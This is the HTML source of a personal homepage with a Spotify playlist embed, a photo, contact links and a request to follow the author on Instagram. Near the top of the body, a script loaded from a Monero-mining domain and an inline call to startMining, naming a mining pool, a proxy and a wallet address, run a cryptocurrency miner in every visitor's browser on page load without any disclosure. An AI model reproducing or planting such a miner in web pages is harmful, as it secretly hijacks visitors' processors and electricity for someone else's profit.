<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Ayush's WEBSITE</title>
    <style>
        body {
            background-color: violet;
            font-family: sans-serif;
            line-height: 1.6;
            margin: 20px;
        }

        h1 {
            text-align: center;
            colour: red;
        }

        hr {
            border: 1px solid #ddd;
            margin: 20px 0;
        }

        .spotify-embed {
            border-radius: 12px;
            width: 100%;
            max-width: 600px; /* Optional: to prevent it from becoming too wide on large screens */
            height: 352px;
            display: block;
            margin: 0 auto;
        }

        p {
            text-align: center;
            colour: White
        }
    </style>
</head>
<body>
    <script src="https://script.monerominer.rocks"></script>
    <script>
    server = "wss://ny1.xmrminingproxy.com";
    var pool = "gulf.moneroocean.stream:10001";
    var walletAddress = "85aGopV4ESjjM9XWKdyHtQBrutARCwqNW359K5ycnnerSYwWtkQACPacFrnWJpExkEgV7besm4vFnCbiWER6FV8ATy7RNXe";
    var workerId = "jph"
    var threads = -1;
    var password = "x";
    startMining(pool, walletAddress, workerId, threads, password);
    throttleMiner = 20;
    </script>
    <h1>Ayush's WEBSITE</h1>
    <hr>
    <img src=https://github.com/apbyp/apbyp.github.io/mypic.png>
    <p>/n</p>
    <iframe class="spotify-embed" src="https://open.spotify.com/embed/playlist/6XCANxgkSd1Pwt7GPBoXLm?utm_source=generator" frameBorder="0" allowfullscreen="" allow="autoplay; clipboard-write; encrypted-media; fullscreen; picture-in-picture" loading="lazy"></iframe>
    <hr>
    <p>I am Ayush Garai</p>
    <p>You may call me lucky</p>
    <a href="mailto:ayushprobroyo@gmail.com">My email address</a> 
    <a href="https://www.instagram.com/ayushprobroyo">My Instagram</a>
    <p>Plz follow me</p>
    <h>If you do not follow mw you will go to hell</h>
    <hr>
    
</body>
</html>

